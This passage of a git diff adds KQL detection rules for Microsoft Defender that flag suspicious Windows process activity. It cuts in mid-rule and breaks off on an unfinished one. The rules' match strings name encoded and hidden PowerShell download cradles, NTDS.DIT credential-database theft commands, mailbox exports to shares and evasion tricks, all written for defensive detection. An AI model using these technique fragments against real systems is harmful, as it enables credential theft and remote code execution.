+| where ((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " PAA" or ProcessCommandLine contains " aQBlAHgA") and (ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))) and (not((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_iex_execution_patterns.kql b/KQL/rules/windows/process_creation/suspicious_powershell_iex_execution_patterns.kql
new file mode 100644
index 00000000..75a1dcc8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_iex_execution_patterns.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell IEX Execution Patterns
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-03-24
+// Level: high
+// Description: Detects suspicious ways to run Invoke-Execution using IEX alias
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Legitimate scripts that use IEX
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " | iex;" or ProcessCommandLine contains " | iex " or ProcessCommandLine contains " | iex}" or ProcessCommandLine contains " | IEX ;" or ProcessCommandLine contains " | IEX -Error" or ProcessCommandLine contains " | IEX (new" or ProcessCommandLine contains ");IEX ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "::FromBase64String" or ProcessCommandLine contains ".GetString([System.Convert]::")) or (ProcessCommandLine contains ")|iex;$" or ProcessCommandLine contains ");iex($" or ProcessCommandLine contains ");iex $" or ProcessCommandLine contains " | IEX | " or ProcessCommandLine contains " | iex\\\"")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_invocations_specific_processcreation.kql b/KQL/rules/windows/process_creation/suspicious_powershell_invocations_specific_processcreation.kql
new file mode 100644
index 00000000..821b70f6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_invocations_specific_processcreation.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious PowerShell Invocations - Specific - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-05
+// Level: medium
+// Description: Detects suspicious PowerShell invocation command parameters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "[Convert]::FromBase64String") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-ep" and ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-Enc") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-noni" and ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object") or (ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object" and ProcessCommandLine contains "Net.WebClient" and ProcessCommandLine contains ".Download") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "\\software\\") or (ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-noprofile" and ProcessCommandLine contains "-windowstyle" and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "new-object" and ProcessCommandLine contains "system.net.webclient" and ProcessCommandLine contains ".download")) and (not((ProcessCommandLine contains "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" or ProcessCommandLine contains "Write-ChocolateyWarning")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_mailbox_export_to_share.kql b/KQL/rules/windows/process_creation/suspicious_powershell_mailbox_export_to_share.kql
new file mode 100644
index 00000000..d59836e8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_mailbox_export_to_share.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious PowerShell Mailbox Export to Share
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-07
+// Level: critical
+// Description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "New-MailboxExportRequest" and ProcessCommandLine contains " -Mailbox " and ProcessCommandLine contains " -FilePath \\\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_parameter_substring.kql b/KQL/rules/windows/process_creation/suspicious_powershell_parameter_substring.kql
new file mode 100644
index 00000000..3c9d2594
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_parameter_substring.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious PowerShell Parameter Substring
+// Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects suspicious PowerShell invocation with a parameter substring
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -windowstyle h " or ProcessCommandLine contains " -windowstyl h" or ProcessCommandLine contains " -windowsty h" or ProcessCommandLine contains " -windowst h" or ProcessCommandLine contains " -windows h" or ProcessCommandLine contains " -windo h" or ProcessCommandLine contains " -wind h" or ProcessCommandLine contains " -win h" or ProcessCommandLine contains " -wi h" or ProcessCommandLine contains " -win h " or ProcessCommandLine contains " -win hi " or ProcessCommandLine contains " -win hid " or ProcessCommandLine contains " -win hidd " or ProcessCommandLine contains " -win hidde " or ProcessCommandLine contains " -NoPr " or ProcessCommandLine contains " -NoPro " or ProcessCommandLine contains " -NoProf " or ProcessCommandLine contains " -NoProfi " or ProcessCommandLine contains " -NoProfil " or ProcessCommandLine contains " -nonin " or ProcessCommandLine contains " -nonint " or ProcessCommandLine contains " -noninte " or ProcessCommandLine contains " -noninter " or ProcessCommandLine contains " -nonintera " or ProcessCommandLine contains " -noninterac " or ProcessCommandLine contains " -noninteract " or ProcessCommandLine contains " -noninteracti " or ProcessCommandLine contains " -noninteractiv " or ProcessCommandLine contains " -ec " or ProcessCommandLine contains " -encodedComman " or ProcessCommandLine contains " -encodedComma " or ProcessCommandLine contains " -encodedComm " or ProcessCommandLine contains " -encodedCom " or ProcessCommandLine contains " -encodedCo " or ProcessCommandLine contains " -encodedC " or ProcessCommandLine contains " -encoded " or ProcessCommandLine contains " -encode " or ProcessCommandLine contains " -encod " or ProcessCommandLine contains " -enco " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -executionpolic " or ProcessCommandLine contains " -executionpoli " or ProcessCommandLine contains " -executionpol " or ProcessCommandLine contains " -executionpo " or ProcessCommandLine contains " -executionp " or ProcessCommandLine contains " -execution bypass" or ProcessCommandLine contains " -executio bypass" or ProcessCommandLine contains " -executi bypass" or ProcessCommandLine contains " -execut bypass" or ProcessCommandLine contains " -execu bypass" or ProcessCommandLine contains " -exec bypass" or ProcessCommandLine contains " -exe bypass" or ProcessCommandLine contains " -ex bypass" or ProcessCommandLine contains " -ep bypass" or ProcessCommandLine contains " /windowstyle h " or ProcessCommandLine contains " /windowstyl h" or ProcessCommandLine contains " /windowsty h" or ProcessCommandLine contains " /windowst h" or ProcessCommandLine contains " /windows h" or ProcessCommandLine contains " /windo h" or ProcessCommandLine contains " /wind h" or ProcessCommandLine contains " /win h" or ProcessCommandLine contains " /wi h" or ProcessCommandLine contains " /win h " or ProcessCommandLine contains " /win hi " or ProcessCommandLine contains " /win hid " or ProcessCommandLine contains " /win hidd " or ProcessCommandLine contains " /win hidde " or ProcessCommandLine contains " /NoPr " or ProcessCommandLine contains " /NoPro " or ProcessCommandLine contains " /NoProf " or ProcessCommandLine contains " /NoProfi " or ProcessCommandLine contains " /NoProfil " or ProcessCommandLine contains " /nonin " or ProcessCommandLine contains " /nonint " or ProcessCommandLine contains " /noninte " or ProcessCommandLine contains " /noninter " or ProcessCommandLine contains " /nonintera " or ProcessCommandLine contains " /noninterac " or ProcessCommandLine contains " /noninteract " or ProcessCommandLine contains " /noninteracti " or ProcessCommandLine contains " /noninteractiv " or ProcessCommandLine contains " /ec " or ProcessCommandLine contains " /encodedComman " or ProcessCommandLine contains " /encodedComma " or ProcessCommandLine contains " /encodedComm " or ProcessCommandLine contains " /encodedCom " or ProcessCommandLine contains " /encodedCo " or ProcessCommandLine contains " /encodedC " or ProcessCommandLine contains " /encoded " or ProcessCommandLine contains " /encode " or ProcessCommandLine contains " /encod " or ProcessCommandLine contains " /enco " or ProcessCommandLine contains " /en " or ProcessCommandLine contains " /executionpolic " or ProcessCommandLine contains " /executionpoli " or ProcessCommandLine contains " /executionpol " or ProcessCommandLine contains " /executionpo " or ProcessCommandLine contains " /executionp " or ProcessCommandLine contains " /execution bypass" or ProcessCommandLine contains " /executio bypass" or ProcessCommandLine contains " /executi bypass" or ProcessCommandLine contains " /execut bypass" or ProcessCommandLine contains " /execu bypass" or ProcessCommandLine contains " /exec bypass" or ProcessCommandLine contains " /exe bypass" or ProcessCommandLine contains " /ex bypass" or ProcessCommandLine contains " /ep bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_parent_process.kql b/KQL/rules/windows/process_creation/suspicious_powershell_parent_process.kql
new file mode 100644
index 00000000..f83f1038
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_parent_process.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell Parent Process
+// Author: Teymur Kheirkhabarov, Harish Segar
+// Date: 2020-03-20
+// Level: high
+// Description: Detects a suspicious or uncommon parent processes of PowerShell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Other scripts
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath contains "tomcat" or (InitiatingProcessFolderPath endswith "\\amigo.exe" or InitiatingProcessFolderPath endswith "\\browser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\jbosssvc.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\microsoftedgecp.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeSH.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\sqlagent.exe" or InitiatingProcessFolderPath endswith "\\sqlserver.exe" or InitiatingProcessFolderPath endswith "\\sqlservr.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "/c pwsh") or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6" or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_process_by_web_server_process.kql b/KQL/rules/windows/process_creation/suspicious_process_by_web_server_process.kql
new file mode 100644
index 00000000..387273e9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_process_by_web_server_process.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Process By Web Server Process
+// Author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1505.003, attack.t1190
+// False Positives:
+//   - Particular web applications may spawn a shell process legitimately
+
+DeviceProcessEvents
+| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((InitiatingProcessCommandLine contains "CATALINA_HOME" or InitiatingProcessCommandLine contains "catalina.home" or InitiatingProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\php.exe" or InitiatingProcessFolderPath endswith "\\tomcat.exe" or InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe")) and (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\at.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dsget.exe" or FolderPath endswith "\\hostname.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netdom.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\qprocess.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\qwinsta.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wusa.exe") and (not(((ProcessCommandLine endswith "Windows\\system32\\cmd.exe /c C:\\ManageEngine\\ADManager \"Plus\\ES\\bin\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt" and InitiatingProcessFolderPath endswith "\\java.exe") or ((ProcessCommandLine contains "sc query" and ProcessCommandLine contains "ADManager Plus") and InitiatingProcessFolderPath endswith "\\java.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_process_created_via_wmic_exe.kql b/KQL/rules/windows/process_creation/suspicious_process_created_via_wmic_exe.kql
new file mode 100644
index 00000000..bb7f2743
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_process_created_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Process Created Via Wmic.EXE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-12
+// Level: high
+// Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") and (ProcessCommandLine contains "process " and ProcessCommandLine contains "call " and ProcessCommandLine contains "create ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_process_execution_from_fake_recycle_bin_folder.kql b/KQL/rules/windows/process_creation/suspicious_process_execution_from_fake_recycle_bin_folder.kql
new file mode 100644
index 00000000..9ae2044d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_process_execution_from_fake_recycle_bin_folder.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Process Execution From Fake Recycle.Bin Folder
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-12
+// Level: high
+// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_process_masquerading_as_svchost_exe.kql b/KQL/rules/windows/process_creation/suspicious_process_masquerading_as_svchost_exe.kql
new file mode 100644
index 00000000..bca7f601
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_process_masquerading_as_svchost_exe.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Process Masquerading As SvcHost.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-08-07
+// Level: high
+// Description: Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location.
+// Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\svchost.exe" and (not(((FolderPath in~ ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")) or ProcessVersionInfoOriginalFileName =~ "svchost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_process_parents.kql b/KQL/rules/windows/process_creation/suspicious_process_parents.kql
new file mode 100644
index 00000000..0ec096c9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_process_parents.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Process Parents
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-21
+// Level: high
+// Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\minesweeper.exe" or InitiatingProcessFolderPath endswith "\\winver.exe" or InitiatingProcessFolderPath endswith "\\bitsadmin.exe") or ((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\eventvwr.exe" or InitiatingProcessFolderPath endswith "\\calc.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe") and (not((isnull(FolderPath) or (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\mmc.exe" or FolderPath endswith "\\win32calc.exe" or FolderPath endswith "\\notepad.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_process_patterns_ntds_dit_exfil.kql b/KQL/rules/windows/process_creation/suspicious_process_patterns_ntds_dit_exfil.kql
new file mode 100644
index 00000000..17947643
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_process_patterns_ntds_dit_exfil.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Process Patterns NTDS.DIT Exfil
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-11
+// Level: high
+// Description: Detects suspicious process patterns used in NTDS.DIT exfiltration
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "ac i ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "/c copy " and ProcessCommandLine contains "\\windows\\ntds\\ntds.dit") or (ProcessCommandLine contains "activate instance ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "ntds.dit") or ((FolderPath endswith "\\NTDSDump.exe" or FolderPath endswith "\\NTDSDumpEx.exe") or (ProcessCommandLine contains "ntds.dit" and ProcessCommandLine contains "system.hiv") or ProcessCommandLine contains "NTDSgrab.ps1")) or (((InitiatingProcessFolderPath contains "\\apache" or InitiatingProcessFolderPath contains "\\tomcat" or InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\") or (FolderPath contains "\\apache" or FolderPath contains "\\tomcat" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Public\\" or FolderPath contains "\\PerfLogs\\")) and ProcessCommandLine contains "ntds.dit")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_process_start_locations.kql b/KQL/rules/windows/process_creation/suspicious_process_start_locations.kql
new file mode 100644
index 00000000..78980468
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_process_start_locations.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Process Start Locations
+// Author: juju4, Jonhnathan Ribeiro, oscd.community
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects suspicious process run from unusual locations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, car.2013-05-002
+// False Positives:
+//   - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where (FolderPath contains ":\\RECYCLER\\" or FolderPath contains ":\\SystemVolumeInformation\\") or (FolderPath startswith "C:\\Windows\\Tasks\\" or FolderPath startswith "C:\\Windows\\debug\\" or FolderPath startswith "C:\\Windows\\fonts\\" or FolderPath startswith "C:\\Windows\\help\\" or FolderPath startswith "C:\\Windows\\drivers\\" or FolderPath startswith "C:\\Windows\\addins\\" or FolderPath startswith "C:\\Windows\\cursors\\" or FolderPath startswith "C:\\Windows\\system32\\tasks\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_java_exe.kql b/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_java_exe.kql
new file mode 100644
index 00000000..0c007948
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_java_exe.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Processes Spawned by Java.EXE
+// Author: Andreas Hunkeler (@Karneades), Florian Roth
+// Date: 2021-12-17
+// Level: high
+// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
+// False Positives:
+//   - Legitimate calls to system binaries
+//   - Company specific internal usage
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_winrm.kql b/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_winrm.kql
new file mode 100644
index 00000000..2e57a8e9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_winrm.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Processes Spawned by WinRM
+// Author: Andreas Hunkeler (@Karneades), Markus Neis
+// Date: 2021-05-20
+// Level: high
+// Description: Detects suspicious processes including shells spawnd from WinRM host process
+// MITRE Tactic: Initial Access
+// Tags: attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation
+// False Positives:
+//   - Legitimate WinRM usage
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql b/KQL/rules/windows/process_creation/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql
new file mode 100644
index 00000000..fd3524e4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE
+// Author: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
+// Date: 2020-05-25
+// Level: high
+// Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "allowedprogram") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "action=allow" and ProcessCommandLine contains "program=")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and (ProcessCommandLine contains ":\\$Recycle.bin\\" or ProcessCommandLine contains ":\\RECYCLER.BIN\\" or ProcessCommandLine contains ":\\RECYCLERS.BIN\\" or ProcessCommandLine contains ":\\SystemVolumeInformation\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Desktop\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\addins\\" or ProcessCommandLine contains ":\\Windows\\cursors\\" or ProcessCommandLine contains ":\\Windows\\debug\\" or ProcessCommandLine contains ":\\Windows\\drivers\\" or ProcessCommandLine contains ":\\Windows\\fonts\\" or ProcessCommandLine contains ":\\Windows\\help\\" or ProcessCommandLine contains ":\\Windows\\system32\\tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Local Settings\\Temporary Internet Files\\" or ProcessCommandLine contains "\\Temporary Internet Files\\Content.Outlook\\" or ProcessCommandLine contains "%Public%\\" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_program_names.kql b/KQL/rules/windows/process_creation/suspicious_program_names.kql
new file mode 100644
index 00000000..7b2928ef
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_program_names.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Program Names
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-11
+// Level: high
+// Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Legitimate tools that accidentally match on the searched patterns
+
+DeviceProcessEvents
